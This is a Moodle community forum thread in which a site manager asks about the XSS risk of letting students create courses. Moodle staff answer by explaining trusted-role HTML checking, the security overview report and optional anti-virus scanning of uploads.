xss risks - Advice please

xss risks - Advice please

Marie Waterhouse發表於
Number of replies: 8

I would like students to be able to create their own courses under a specific category - a 'My MOODLE' feature.

While looking at the permissions there is a red flag warning regarding XSS risks.

I can not see how there is a greater XSS risk for a student to manage their own moodle 'course' than the current system gives them anyway.

For example under Home > My Profile Settings > Edit Profile  they already have the capability to add files (image and media) and HTML? This must pose the same XSS risk?

Any advice much appreciated.

Many thanks

Marie

I have not attached a file - would that not be an xss risk?





評比平均分數: -
In reply to Marie Waterhouse

Re: xss risks - Advice please

Helen Foster發表於
Core developers的相片 Documentation writers的相片 Moodle HQ的相片 Particularly helpful Moodlers的相片 Plugin developers的相片 Testers的相片 Translators的相片
Hi Marie,

If you try adding some HTML containing JavaScript to your profile description you'll find you are prevented from doing so. However, as a teacher, you are allowed to add HTML containing JavaScript in a page resource or an HTML block or anywhere else in your course.

This is because all the places in Moodle where an authenticated user can add HTML are subjected to checks before the HTML is saved. Places in Moodle where a teacher or admin can add HTML are not checked. The same applies to files. As a student in this course, you can attach a file to your forum post, though it will be checked for any potentially malicious code before being displayed.

Please see the documentation XSS trusted users for further details.
評比平均分數:Useful (2)
In reply to Helen Foster

Re: xss risks - Advice please

Marie Waterhouse發表於

Thank you very much for your advice Helen.

Please can you expand a bit further for me.

You mention that "places in Moodle where an authenticated user can add HTML are subjected to checks before the HTML is saved" and "As a student in this course, you can attach a file to your forum post, though it will be checked for any potentially malicious code before being displayed"

Who or what does the checking? Does MOODLE automatically scan any submission for malicious  content or am I (as a manager) supposed to do this?

I was thinking A) that if MOODLE auto scanned any submissions based on the user role ie 'Student' then I would be covered because they would still have that role? They would be a Student with some of the course creation permissions?

B) I was also thinking that not every bit of malicious code is placed intentionally. What if a 'Manager' attached a corrupted file unintentionally? Would that not get checked?

Best wishes and thank you once again for your help

Marie

評比平均分數: -
In reply to Marie Waterhouse

Re: xss risks - Advice please

Helen Foster發表於
Core developers的相片 Documentation writers的相片 Moodle HQ的相片 Particularly helpful Moodlers的相片 Plugin developers的相片 Testers的相片 Translators的相片
To answer your further questions (good that you ask about anything you're not sure of), it's Moodle that automatically checks HTML and files.

A) If you give a user extra permissions, for example by assigning them the role of teacher in a course, then in that context (i.e. in the course) any files or HTML that they add will not be checked. In a different course, where the user has the role of student, their files and HTML will be checked.

B) If a user with the role of manager attached a corrupted file unintentionally, it would not be checked. We trust teachers and managers to not add files or HTML containing malicious code. You've probably come across the security overview report (in Site administration > Reports > Security overview) which lists all trusted users on the site to remind admins to double-check that everyone really can be trusted.
評比平均分數: -
In reply to Helen Foster

Re: xss risks - Advice please

Marie Waterhouse發表於

Thank you Helen,

For us the problem would not be a lack of trust but more a lack of knowledge. None of us would know if we were uploading bad files.

Many thanks

評比平均分數: -
In reply to Helen Foster

Re: xss risks - Advice please

Andrew Lyons發表於
Core developers的相片 Moodle HQ的相片 Particularly helpful Moodlers的相片 Peer reviewers的相片 Plugin developers的相片 Testers的相片

Hi,

Just to clarify, if configured, Moodle will pass all uploaded content through a virus scanner. This is not just student content - all attachments are subject to this scan. Most virus checkers also pick out malware.

Andrew

評比平均分數:Useful (3)
In reply to Andrew Lyons

Re: xss risks - Advice please

Marie Waterhouse發表於

Thank you Andrew - It is a relief to hear that.  I bet you can guess what question is coming next 微笑 You say 'if configured' how can I configure  or check  if it has been. Can you point me in the right direction please?

Best wishes and many thanks

Marie



評比平均分數: -
In reply to Andrew Lyons

Re: xss risks - Advice please

Marie Waterhouse發表於

Have found

Home > Site Admin> Security > Anti-Virus

Hope I am on the right tracks with this.

Regards

Marie

評比平均分數: -